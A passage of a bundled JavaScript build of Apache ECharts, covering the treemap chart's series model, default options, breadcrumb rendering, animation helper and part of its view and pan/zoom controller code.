License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterVisual(visualSymbol('tree', 'circle'));\nregisterLayout(treeLayout);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction retrieveTargetInfo(payload, validPayloadTypes, seriesModel) {\n    if (payload && indexOf(validPayloadTypes, payload.type) >= 0) {\n        var root = seriesModel.getData().tree.root;\n        var targetNode = payload.targetNode;\n\n        if (typeof targetNode === 'string') {\n            targetNode = root.getNodeById(targetNode);\n        }\n\n        if (targetNode && root.contains(targetNode)) {\n            return {node: targetNode};\n        }\n\n        var targetNodeId = payload.targetNodeId;\n        if (targetNodeId != null && (targetNode = root.getNodeById(targetNodeId))) {\n            return {node: targetNode};\n        }\n    }\n}\n\n// Not includes the given node at the last item.\nfunction getPathToRoot(node) {\n    var path = [];\n    while (node) {\n        node = node.parentNode;\n        node && path.push(node);\n    }\n    return path.reverse();\n}\n\nfunction aboveViewRoot(viewRoot, node) {\n    var viewPath = getPathToRoot(viewRoot);\n    return indexOf(viewPath, node) >= 0;\n}\n\n// From root to the input node (the input node will be included).\nfunction wrapTreePathInfo(node, seriesModel) {\n    var treePathInfo = [];\n\n    while (node) {\n        var nodeDataIndex = node.dataIndex;\n        treePathInfo.push({\n            name: node.name,\n            dataIndex: nodeDataIndex,\n            value: seriesModel.getRawValue(nodeDataIndex)\n        });\n        node = node.parentNode;\n    }\n\n    treePathInfo.reverse();\n\n    return treePathInfo;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n\n    type: 'series.treemap',\n\n    layoutMode: 'box',\n\n    dependencies: ['grid', 'polar'],\n\n    preventUsingHoverLayer: true,\n\n    /**\n     * @type {module:echarts/data/Tree~Node}\n     */\n    _viewRoot: null,\n\n    defaultOption: {\n        // Disable progressive rendering\n        progressive: 0,\n        // center: ['50%', '50%'],          // not supported in ec3.\n        // size: ['80%', '80%'],            // deprecated, compatible with ec2.\n        left: 'center',\n        top: 'middle',\n        right: null,\n        bottom: null,\n        width: '80%',\n        height: '80%',\n        sort: true,                         // Can be null or false or true\n                                            // (order by desc default, asc not supported yet (strange effect))\n        clipWindow: 'origin',               // Size of clipped window when zooming. 'origin' or 'fullscreen'\n        squareRatio: 0.5 * (1 + Math.sqrt(5)), // golden ratio\n        leafDepth: null,                    // Nodes on depth from root are regarded as leaves.\n                                            // Count from zero (zero represents only view root).\n        drillDownIcon: '▶',                 // Use html character temporarily because it is complicated\n                                            // to align specialized icon. ▷▶❒❐▼✚\n\n        zoomToNodeRatio: 0.32 * 0.32,       // Be effective when using zoomToNode. Specify the proportion of the\n                                            // target node area in the view area.\n        roam: true,                         // true, false, 'scale' or 'zoom', 'move'.\n        nodeClick: 'zoomToNode',            // Leaf node click behaviour: 'zoomToNode', 'link', false.\n                                            // If leafDepth is set and clicking a node which has children but\n                                            // be on left depth, the behaviour would be changing root. Otherwise\n                                            // use behavious defined above.\n        animation: true,\n        animationDurationUpdate: 900,\n        animationEasing: 'quinticInOut',\n        breadcrumb: {\n            show: true,\n            height: 22,\n            left: 'center',\n            top: 'bottom',\n            // right\n            // bottom\n            emptyItemWidth: 25,             // Width of empty node.\n            itemStyle: {\n                color: 'rgba(0,0,0,0.7)', //'#5793f3',\n                borderColor: 'rgba(255,255,255,0.7)',\n                borderWidth: 1,\n                shadowColor: 'rgba(150,150,150,1)',\n                shadowBlur: 3,\n                shadowOffsetX: 0,\n                shadowOffsetY: 0,\n                textStyle: {\n                    color: '#fff'\n                }\n            },\n            emphasis: {\n                textStyle: {}\n            }\n        },\n        label: {\n            show: true,\n            // Do not use textDistance, for ellipsis rect just the same as treemap node rect.\n            distance: 0,\n            padding: 5,\n            position: 'inside', // Can be [5, '5%'] or position stirng like 'insideTopLeft', ...\n            // formatter: null,\n            color: '#fff',\n            ellipsis: true\n            // align\n            // verticalAlign\n        },\n        upperLabel: {                   // Label when node is parent.\n            show: false,\n            position: [0, '50%'],\n            height: 20,\n            // formatter: null,\n            color: '#fff',\n            ellipsis: true,\n            // align: null,\n            verticalAlign: 'middle'\n        },\n        itemStyle: {\n            color: null,            // Can be 'none' if not necessary.\n            colorAlpha: null,       // Can be 'none' if not necessary.\n            colorSaturation: null,  // Can be 'none' if not necessary.\n            borderWidth: 0,\n            gapWidth: 0,\n            borderColor: '#fff',\n            borderColorSaturation: null // If specified, borderColor will be ineffective, and the\n                                        // border color is evaluated by color of current node and\n                                        // borderColorSaturation.\n        },\n        emphasis: {\n            upperLabel: {\n                show: true,\n                position: [0, '50%'],\n                color: '#fff',\n                ellipsis: true,\n                verticalAlign: 'middle'\n            }\n        },\n\n        visualDimension: 0,                 // Can be 0, 1, 2, 3.\n        visualMin: null,\n        visualMax: null,\n\n        color: [],                  // + treemapSeries.color should not be modified. Please only modified\n                                    // level[n].color (if necessary).\n                                    // + Specify color list of each level. level[0].color would be global\n                                    // color list if not specified. (see method `setDefault`).\n                                    // + But set as a empty array to forbid fetch color from global palette\n                                    // when using nodeModel.get('color'), otherwise nodes on deep level\n                                    // will always has color palette set and are not able to inherit color\n                                    // from parent node.\n                                    // + TreemapSeries.color can not be set as 'none', otherwise effect\n                                    // legend color fetching (see seriesColor.js).\n        colorAlpha: null,           // Array. Specify color alpha range of each level, like [0.2, 0.8]\n        colorSaturation: null,      // Array. Specify color saturation of each level, like [0.2, 0.5]\n        colorMappingBy: 'index',    // 'value' or 'index' or 'id'.\n        visibleMin: 10,             // If area less than this threshold (unit: pixel^2), node will not\n                                    // be rendered. Only works when sort is 'asc' or 'desc'.\n        childrenVisibleMin: null,   // If area of a node less than this threshold (unit: pixel^2),\n                                    // grandchildren will not show.\n                                    // Why grandchildren? If not grandchildren but children,\n                                    // some siblings show children and some not,\n                                    // the appearance may be mess and not consistent,\n        levels: []                  // Each item: {\n                                    //     visibleMin, itemStyle, visualDimension, label\n                                    // }\n        // data: {\n        //      value: [],\n        //      children: [],\n        //      link: 'http://xxx.xxx.xxx',\n        //      target: 'blank' or 'self'\n        // }\n    },\n\n    /**\n     * @override\n     */\n    getInitialData: function (option, ecModel) {\n        // Create a virtual root.\n        var root = {name: option.name, children: option.data};\n\n        completeTreeValue(root);\n\n        var levels = option.levels || [];\n\n        levels = option.levels = setDefault(levels, ecModel);\n\n        var treeOption = {};\n\n        treeOption.levels = levels;\n\n        // Make sure always a new tree is created when setOption,\n        // in TreemapView, we check whether oldTree === newTree\n        // to choose mappings approach among old shapes and new shapes.\n        return Tree.createTree(root, this, treeOption).data;\n    },\n\n    optionUpdated: function () {\n        this.resetViewRoot();\n    },\n\n    /**\n     * @override\n     * @param {number} dataIndex\n     * @param {boolean} [mutipleSeries=false]\n     */\n    formatTooltip: function (dataIndex) {\n        var data = this.getData();\n        var value = this.getRawValue(dataIndex);\n        var formattedValue = isArray(value)\n            ? addCommas(value[0]) : addCommas(value);\n        var name = data.getName(dataIndex);\n\n        return encodeHTML(name + ': ' + formattedValue);\n    },\n\n    /**\n     * Add tree path to tooltip param\n     *\n     * @override\n     * @param {number} dataIndex\n     * @return {Object}\n     */\n    getDataParams: function (dataIndex) {\n        var params = SeriesModel.prototype.getDataParams.apply(this, arguments);\n\n        var node = this.getData().tree.getNodeByDataIndex(dataIndex);\n        params.treePathInfo = wrapTreePathInfo(node, this);\n\n        return params;\n    },\n\n    /**\n     * @public\n     * @param {Object} layoutInfo {\n     *                                x: containerGroup x\n     *                                y: containerGroup y\n     *                                width: containerGroup width\n     *                                height: containerGroup height\n     *                            }\n     */\n    setLayoutInfo: function (layoutInfo) {\n        /**\n         * @readOnly\n         * @type {Object}\n         */\n        this.layoutInfo = this.layoutInfo || {};\n        extend(this.layoutInfo, layoutInfo);\n    },\n\n    /**\n     * @param  {string} id\n     * @return {number} index\n     */\n    mapIdToIndex: function (id) {\n        // A feature is implemented:\n        // index is monotone increasing with the sequence of\n        // input id at the first time.\n        // This feature can make sure that each data item and its\n        // mapped color have the same index between data list and\n        // color list at the beginning, which is useful for user\n        // to adjust data-color mapping.\n\n        /**\n         * @private\n         * @type {Object}\n         */\n        var idIndexMap = this._idIndexMap;\n\n        if (!idIndexMap) {\n            idIndexMap = this._idIndexMap = createHashMap();\n            /**\n             * @private\n             * @type {number}\n             */\n            this._idIndexMapCount = 0;\n        }\n\n        var index = idIndexMap.get(id);\n        if (index == null) {\n            idIndexMap.set(id, index = this._idIndexMapCount++);\n        }\n\n        return index;\n    },\n\n    getViewRoot: function () {\n        return this._viewRoot;\n    },\n\n    /**\n     * @param {module:echarts/data/Tree~Node} [viewRoot]\n     */\n    resetViewRoot: function (viewRoot) {\n        viewRoot\n            ? (this._viewRoot = viewRoot)\n            : (viewRoot = this._viewRoot);\n\n        var root = this.getRawData().tree.root;\n\n        if (!viewRoot\n            || (viewRoot !== root && !root.contains(viewRoot))\n        ) {\n            this._viewRoot = root;\n        }\n    }\n});\n\n/**\n * @param {Object} dataNode\n */\nfunction completeTreeValue(dataNode) {\n    // Postorder travel tree.\n    // If value of none-leaf node is not set,\n    // calculate it by suming up the value of all children.\n    var sum = 0;\n\n    each$1(dataNode.children, function (child) {\n\n        completeTreeValue(child);\n\n        var childValue = child.value;\n        isArray(childValue) && (childValue = childValue[0]);\n\n        sum += childValue;\n    });\n\n    var thisValue = dataNode.value;\n    if (isArray(thisValue)) {\n        thisValue = thisValue[0];\n    }\n\n    if (thisValue == null || isNaN(thisValue)) {\n        thisValue = sum;\n    }\n    // Value should not less than 0.\n    if (thisValue < 0) {\n        thisValue = 0;\n    }\n\n    isArray(dataNode.value)\n        ? (dataNode.value[0] = thisValue)\n        : (dataNode.value = thisValue);\n}\n\n/**\n * set default to level configuration\n */\nfunction setDefault(levels, ecModel) {\n    var globalColorList = ecModel.get('color');\n\n    if (!globalColorList) {\n        return;\n    }\n\n    levels = levels || [];\n    var hasColorDefine;\n    each$1(levels, function (levelDefine) {\n        var model = new Model(levelDefine);\n        var modelColor = model.get('color');\n\n        if (model.get('itemStyle.color')\n            || (modelColor && modelColor !== 'none')\n        ) {\n            hasColorDefine = true;\n        }\n    });\n\n    if (!hasColorDefine) {\n        var level0 = levels[0] || (levels[0] = {});\n        level0.color = globalColorList.slice();\n    }\n\n    return levels;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar TEXT_PADDING = 8;\nvar ITEM_GAP = 8;\nvar ARRAY_LENGTH = 5;\n\nfunction Breadcrumb(containerGroup) {\n    /**\n     * @private\n     * @type {module:zrender/container/Group}\n     */\n    this.group = new Group();\n\n    containerGroup.add(this.group);\n}\n\nBreadcrumb.prototype = {\n\n    constructor: Breadcrumb,\n\n    render: function (seriesModel, api, targetNode, onSelect) {\n        var model = seriesModel.getModel('breadcrumb');\n        var thisGroup = this.group;\n\n        thisGroup.removeAll();\n\n        if (!model.get('show') || !targetNode) {\n            return;\n        }\n\n        var normalStyleModel = model.getModel('itemStyle');\n        // var emphasisStyleModel = model.getModel('emphasis.itemStyle');\n        var textStyleModel = normalStyleModel.getModel('textStyle');\n\n        var layoutParam = {\n            pos: {\n                left: model.get('left'),\n                right: model.get('right'),\n                top: model.get('top'),\n                bottom: model.get('bottom')\n            },\n            box: {\n                width: api.getWidth(),\n                height: api.getHeight()\n            },\n            emptyItemWidth: model.get('emptyItemWidth'),\n            totalWidth: 0,\n            renderList: []\n        };\n\n        this._prepare(targetNode, layoutParam, textStyleModel);\n        this._renderContent(seriesModel, layoutParam, normalStyleModel, textStyleModel, onSelect);\n\n        positionElement(thisGroup, layoutParam.pos, layoutParam.box);\n    },\n\n    /**\n     * Prepare render list and total width\n     * @private\n     */\n    _prepare: function (targetNode, layoutParam, textStyleModel) {\n        for (var node = targetNode; node; node = node.parentNode) {\n            var text = node.getModel().get('name');\n            var textRect = textStyleModel.getTextRect(text);\n            var itemWidth = Math.max(\n                textRect.width + TEXT_PADDING * 2,\n                layoutParam.emptyItemWidth\n            );\n            layoutParam.totalWidth += itemWidth + ITEM_GAP;\n            layoutParam.renderList.push({node: node, text: text, width: itemWidth});\n        }\n    },\n\n    /**\n     * @private\n     */\n    _renderContent: function (\n        seriesModel, layoutParam, normalStyleModel, textStyleModel, onSelect\n    ) {\n        // Start rendering.\n        var lastX = 0;\n        var emptyItemWidth = layoutParam.emptyItemWidth;\n        var height = seriesModel.get('breadcrumb.height');\n        var availableSize = getAvailableSize(layoutParam.pos, layoutParam.box);\n        var totalWidth = layoutParam.totalWidth;\n        var renderList = layoutParam.renderList;\n\n        for (var i = renderList.length - 1; i >= 0; i--) {\n            var item = renderList[i];\n            var itemNode = item.node;\n            var itemWidth = item.width;\n            var text = item.text;\n\n            // Hdie text and shorten width if necessary.\n            if (totalWidth > availableSize.width) {\n                totalWidth -= itemWidth - emptyItemWidth;\n                itemWidth = emptyItemWidth;\n                text = null;\n            }\n\n            var el = new Polygon({\n                shape: {\n                    points: makeItemPoints(\n                        lastX, 0, itemWidth, height,\n                        i === renderList.length - 1, i === 0\n                    )\n                },\n                style: defaults(\n                    normalStyleModel.getItemStyle(),\n                    {\n                        lineJoin: 'bevel',\n                        text: text,\n                        textFill: textStyleModel.getTextColor(),\n                        textFont: textStyleModel.getFont()\n                    }\n                ),\n                z: 10,\n                onclick: curry(onSelect, itemNode)\n            });\n            this.group.add(el);\n\n            packEventData(el, seriesModel, itemNode);\n\n            lastX += itemWidth + ITEM_GAP;\n        }\n    },\n\n    /**\n     * @override\n     */\n    remove: function () {\n        this.group.removeAll();\n    }\n};\n\nfunction makeItemPoints(x, y, itemWidth, itemHeight, head, tail) {\n    var points = [\n        [head ? x : x - ARRAY_LENGTH, y],\n        [x + itemWidth, y],\n        [x + itemWidth, y + itemHeight],\n        [head ? x : x - ARRAY_LENGTH, y + itemHeight]\n    ];\n    !tail && points.splice(2, 0, [x + itemWidth + ARRAY_LENGTH, y + itemHeight / 2]);\n    !head && points.push([x, y + itemHeight / 2]);\n    return points;\n}\n\n// Package custom mouse event.\nfunction packEventData(el, seriesModel, itemNode) {\n    el.eventData = {\n        componentType: 'series',\n        componentSubType: 'treemap',\n        componentIndex: seriesModel.componentIndex,\n        seriesIndex: seriesModel.componentIndex,\n        seriesName: seriesModel.name,\n        seriesType: 'treemap',\n        selfType: 'breadcrumb', // Distinguish with click event on treemap node.\n        nodeData: {\n            dataIndex: itemNode && itemNode.dataIndex,\n            name: itemNode && itemNode.name\n        },\n        treePathInfo: itemNode && wrapTreePathInfo(itemNode, seriesModel)\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {number} [time=500] Time in ms\n * @param {string} [easing='linear']\n * @param {number} [delay=0]\n * @param {Function} [callback]\n *\n * @example\n *  // Animate position\n *  animation\n *      .createWrap()\n *      .add(el1, {position: [10, 10]})\n *      .add(el2, {shape: {width: 500}, style: {fill: 'red'}}, 400)\n *      .done(function () { // done })\n *      .start('cubicOut');\n */\nfunction createWrap() {\n\n    var storage = [];\n    var elExistsMap = {};\n    var doneCallback;\n\n    return {\n\n        /**\n         * Caution: a el can only be added once, otherwise 'done'\n         * might not be called. This method checks this (by el.id),\n         * suppresses adding and returns false when existing el found.\n         *\n         * @param {modele:zrender/Element} el\n         * @param {Object} target\n         * @param {number} [time=500]\n         * @param {number} [delay=0]\n         * @param {string} [easing='linear']\n         * @return {boolean} Whether adding succeeded.\n         *\n         * @example\n         *     add(el, target, time, delay, easing);\n         *     add(el, target, time, easing);\n         *     add(el, target, time);\n         *     add(el, target);\n         */\n        add: function (el, target, time, delay, easing) {\n            if (isString(delay)) {\n                easing = delay;\n                delay = 0;\n            }\n\n            if (elExistsMap[el.id]) {\n                return false;\n            }\n            elExistsMap[el.id] = 1;\n\n            storage.push(\n                {el: el, target: target, time: time, delay: delay, easing: easing}\n            );\n\n            return true;\n        },\n\n        /**\n         * Only execute when animation finished. Will not execute when any\n         * of 'stop' or 'stopAnimation' called.\n         *\n         * @param {Function} callback\n         */\n        done: function (callback) {\n            doneCallback = callback;\n            return this;\n        },\n\n        /**\n         * Will stop exist animation firstly.\n         */\n        start: function () {\n            var count = storage.length;\n\n            for (var i = 0, len = storage.length; i < len; i++) {\n                var item = storage[i];\n                item.el.animateTo(item.target, item.time, item.delay, item.easing, done);\n            }\n\n            return this;\n\n            function done() {\n                count--;\n                if (!count) {\n                    storage.length = 0;\n                    elExistsMap = {};\n                    doneCallback && doneCallback();\n                }\n            }\n        }\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar bind$1 = bind;\nvar Group$2 = Group;\nvar Rect$1 = Rect;\nvar each$8 = each$1;\n\nvar DRAG_THRESHOLD = 3;\nvar PATH_LABEL_NOAMAL = ['label'];\nvar PATH_LABEL_EMPHASIS = ['emphasis', 'label'];\nvar PATH_UPPERLABEL_NORMAL = ['upperLabel'];\nvar PATH_UPPERLABEL_EMPHASIS = ['emphasis', 'upperLabel'];\nvar Z_BASE = 10; // Should bigger than every z.\nvar Z_BG = 1;\nvar Z_CONTENT = 2;\n\nvar getItemStyleEmphasis = makeStyleMapper([\n    ['fill', 'color'],\n    // `borderColor` and `borderWidth` has been occupied,\n    // so use `stroke` to indicate the stroke of the rect.\n    ['stroke', 'strokeColor'],\n    ['lineWidth', 'strokeWidth'],\n    ['shadowBlur'],\n    ['shadowOffsetX'],\n    ['shadowOffsetY'],\n    ['shadowColor']\n]);\nvar getItemStyleNormal = function (model) {\n    // Normal style props should include emphasis style props.\n    var itemStyle = getItemStyleEmphasis(model);\n    // Clear styles set by emphasis.\n    itemStyle.stroke = itemStyle.fill = itemStyle.lineWidth = null;\n    return itemStyle;\n};\n\nextendChartView({\n\n    type: 'treemap',\n\n    /**\n     * @override\n     */\n    init: function (o, api) {\n\n        /**\n         * @private\n         * @type {module:zrender/container/Group}\n         */\n        this._containerGroup;\n\n        /**\n         * @private\n         * @type {Object.<string, Array.<module:zrender/container/Group>>}\n         */\n        this._storage = createStorage();\n\n        /**\n         * @private\n         * @type {module:echarts/data/Tree}\n         */\n        this._oldTree;\n\n        /**\n         * @private\n         * @type {module:echarts/chart/treemap/Breadcrumb}\n         */\n        this._breadcrumb;\n\n        /**\n         * @private\n         * @type {module:echarts/component/helper/RoamController}\n         */\n        this._controller;\n\n        /**\n         * 'ready', 'animating'\n         * @private\n         */\n        this._state = 'ready';\n    },\n\n    /**\n     * @override\n     */\n    render: function (seriesModel, ecModel, api, payload) {\n\n        var models = ecModel.findComponents({\n            mainType: 'series', subType: 'treemap', query: payload\n        });\n        if (indexOf(models, seriesModel) < 0) {\n            return;\n        }\n\n        this.seriesModel = seriesModel;\n        this.api = api;\n        this.ecModel = ecModel;\n\n        var types = ['treemapZoomToNode', 'treemapRootToNode'];\n        var targetInfo = retrieveTargetInfo(payload, types, seriesModel);\n        var payloadType = payload && payload.type;\n        var layoutInfo = seriesModel.layoutInfo;\n        var isInit = !this._oldTree;\n        var thisStorage = this._storage;\n\n        // Mark new root when action is treemapRootToNode.\n        var reRoot = (payloadType === 'treemapRootToNode' && targetInfo && thisStorage)\n            ? {\n                rootNodeGroup: thisStorage.nodeGroup[targetInfo.node.getRawIndex()],\n                direction: payload.direction\n            }\n            : null;\n\n        var containerGroup = this._giveContainerGroup(layoutInfo);\n\n        var renderResult = this._doRender(containerGroup, seriesModel, reRoot);\n        (\n            !isInit && (\n                !payloadType\n                || payloadType === 'treemapZoomToNode'\n                || payloadType === 'treemapRootToNode'\n            )\n        )\n            ? this._doAnimation(containerGroup, renderResult, seriesModel, reRoot)\n            : renderResult.renderFinally();\n\n        this._resetController(api);\n\n        this._renderBreadcrumb(seriesModel, api, targetInfo);\n    },\n\n    /**\n     * @private\n     */\n    _giveContainerGroup: function (layoutInfo) {\n        var containerGroup = this._containerGroup;\n        if (!containerGroup) {\n            // FIXME\n            // 加一层containerGroup是为了clip，但是现在clip功能并没有实现。\n            containerGroup = this._containerGroup = new Group$2();\n            this._initEvents(containerGroup);\n            this.group.add(containerGroup);\n        }\n        containerGroup.attr('position', [layoutInfo.x, layoutInfo.y]);\n\n        return containerGroup;\n    },\n\n    /**\n     * @private\n     */\n    _doRender: function (containerGroup, seriesModel, reRoot) {\n        var thisTree = seriesModel.getData().tree;\n        var oldTree = this._oldTree;\n\n        // Clear last shape records.\n        var lastsForAnimation = createStorage();\n        var thisStorage = createStorage();\n        var oldStorage = this._storage;\n        var willInvisibleEls = [];\n\n        var doRenderNode = curry(\n            renderNode, seriesModel,\n            thisStorage, oldStorage, reRoot,\n            lastsForAnimation, willInvisibleEls\n        );\n\n        // Notice: when thisTree and oldTree are the same tree (see list.cloneShallow),\n        // the oldTree is actually losted, so we can not find all of the old graphic\n        // elements from tree. So we use this stragegy: make element storage, move\n        // from old storage to new storage, clear old storage.\n\n        dualTravel(\n            thisTree.root ? [thisTree.root] : [],\n            (oldTree && oldTree.root) ? [oldTree.root] : [],\n            containerGroup,\n            thisTree === oldTree || !oldTree,\n            0\n        );\n\n        // Process all removing.\n        var willDeleteEls = clearStorage(oldStorage);\n\n        this._oldTree = thisTree;\n        this._storage = thisStorage;\n\n        return {\n            lastsForAnimation: lastsForAnimation,\n            willDeleteEls: willDeleteEls,\n            renderFinally: renderFinally\n        };\n\n        function dualTravel(thisViewChildren, oldViewChildren, parentGroup, sameTree, depth) {\n            // When 'render' is triggered by action,\n            // 'this' and 'old' may be the same tree,\n            // we use rawIndex in that case.\n            if (sameTree) {\n                oldViewChildren = thisViewChildren;\n                each$8(thisViewChildren, function (child, index) {\n                    !child.isRemoved() && processNode(index, index);\n                });\n            }\n            // Diff hierarchically (diff only in each subtree, but not whole).\n            // because, consistency of view is important.\n            else {\n                (new DataDiffer(oldViewChildren, thisViewChildren, getKey, getKey))\n                    .add(processNode)\n                    .update(processNode)\n                    .remove(curry(processNode, null))\n                    .execute();\n            }\n\n            function getKey(node) {\n                // Identify by name or raw index.\n                return node.getId();\n            }\n\n            function processNode(newIndex, oldIndex) {\n                var thisNode = newIndex != null ? thisViewChildren[newIndex] : null;\n                var oldNode = oldIndex != null ? oldViewChildren[oldIndex] : null;\n\n                var group = doRenderNode(thisNode, oldNode, parentGroup, depth);\n\n                group && dualTravel(\n                    thisNode && thisNode.viewChildren || [],\n                    oldNode && oldNode.viewChildren || [],\n                    group,\n                    sameTree,\n                    depth + 1\n                );\n            }\n        }\n\n        function clearStorage(storage) {\n            var willDeleteEls = createStorage();\n            storage && each$8(storage, function (store, storageName) {\n                var delEls = willDeleteEls[storageName];\n                each$8(store, function (el) {\n                    el && (delEls.push(el), el.__tmWillDelete = 1);\n                });\n            });\n            return willDeleteEls;\n        }\n\n        function renderFinally() {\n            each$8(willDeleteEls, function (els) {\n                each$8(els, function (el) {\n                    el.parent && el.parent.remove(el);\n                });\n            });\n            each$8(willInvisibleEls, function (el) {\n                el.invisible = true;\n                // Setting invisible is for optimizing, so no need to set dirty,\n                // just mark as invisible.\n                el.dirty();\n            });\n        }\n    },\n\n    /**\n     * @private\n     */\n    _doAnimation: function (containerGroup, renderResult, seriesModel, reRoot) {\n        if (!seriesModel.get('animation')) {\n            return;\n        }\n\n        var duration = seriesModel.get('animationDurationUpdate');\n        var easing = seriesModel.get('animationEasing');\n        var animationWrap = createWrap();\n\n        // Make delete animations.\n        each$8(renderResult.willDeleteEls, function (store, storageName) {\n            each$8(store, function (el, rawIndex) {\n                if (el.invisible) {\n                    return;\n                }\n\n                var parent = el.parent; // Always has parent, and parent is nodeGroup.\n                var target;\n\n                if (reRoot && reRoot.direction === 'drillDown') {\n                    target = parent === reRoot.rootNodeGroup\n                        // This is the content element of view root.\n                        // Only `content` will enter this branch, because\n                        // `background` and `nodeGroup` will not be deleted.\n                        ? {\n                            shape: {\n                                x: 0,\n                                y: 0,\n                                width: parent.__tmNodeWidth,\n                                height: parent.__tmNodeHeight\n                            },\n                            style: {\n                                opacity: 0\n                            }\n                        }\n                        // Others.\n                        : {style: {opacity: 0}};\n                }\n                else {\n                    var targetX = 0;\n                    var targetY = 0;\n\n                    if (!parent.__tmWillDelete) {\n                        // Let node animate to right-bottom corner, cooperating with fadeout,\n                        // which is appropriate for user understanding.\n                        // Divided by 2 for reRoot rolling up effect.\n                        targetX = parent.__tmNodeWidth / 2;\n                        targetY = parent.__tmNodeHeight / 2;\n                    }\n\n                    target = storageName === 'nodeGroup'\n                        ? {position: [targetX, targetY], style: {opacity: 0}}\n                        : {\n                            shape: {x: targetX, y: targetY, width: 0, height: 0},\n                            style: {opacity: 0}\n                        };\n                }\n\n                target && animationWrap.add(el, target, duration, easing);\n            });\n        });\n\n        // Make other animations\n        each$8(this._storage, function (store, storageName) {\n            each$8(store, function (el, rawIndex) {\n                var last = renderResult.lastsForAnimation[storageName][rawIndex];\n                var target = {};\n\n                if (!last) {\n                    return;\n                }\n\n                if (storageName === 'nodeGroup') {\n                    if (last.old) {\n                        target.position = el.position.slice();\n                        el.attr('position', last.old);\n                    }\n                }\n                else {\n                    if (last.old) {\n                        target.shape = extend({}, el.shape);\n                        el.setShape(last.old);\n                    }\n\n                    if (last.fadein) {\n                        el.setStyle('opacity', 0);\n                        target.style = {opacity: 1};\n                    }\n                    // When animation is stopped for succedent animation starting,\n                    // el.style.opacity might not be 1\n                    else if (el.style.opacity !== 1) {\n                        target.style = {opacity: 1};\n                    }\n                }\n\n                animationWrap.add(el, target, duration, easing);\n            });\n        }, this);\n\n        this._state = 'animating';\n\n        animationWrap\n            .done(bind$1(function () {\n                this._state = 'ready';\n                renderResult.renderFinally();\n            }, this))\n            .start();\n    },\n\n    /**\n     * @private\n     */\n    _resetController: function (api) {\n        var controller = this._controller;\n\n        // Init controller.\n        if (!controller) {\n            controller = this._controller = new RoamController(api.getZr());\n            controller.enable(this.seriesModel.get('roam'));\n            controller.on('pan', bind$1(this._onPan, this));\n            controller.on('zoom', bind$1(this._onZoom, this));\n        }\n\n        var rect = new BoundingRect(0, 0, api.getWidth(), api.getHeight());\n        controller.setPointerChecker(function (e, x, y) {\n            return rect.contain(x, y);\n        });\n    },\n\n    /**\n     * @private\n     */\n    _clearController: function () {\n        var controller = this._controller;\n        if (controller) {\n            controller.dispose();\n            controller = null;\n        }\n    },\n\n    /**\n     * @private\n     */\n    _onPan: function (e) {\n        if (this._state !== 'animating'\n            && (Math.abs(e.dx) > DRAG_THRESHOLD || Math.abs(e.dy) > DRAG_THRESHOLD)\n        ) {\n            // These param must not be cached.\n            var root = this.seriesModel.getData().tree.root;\n\n            if (!root) {\n                return;\n            }\n\n            var rootLayout = root.getLayout();\n\n            if (!rootLayout) {\n                return;\n            }\n\n            this.api.dispatchAction({\n                type: 'treemapMove',\n                from: this.uid,\n                seriesId: this.seriesModel.id,\n                rootRect: {\n                    x: rootLayout.x + e.dx, y: 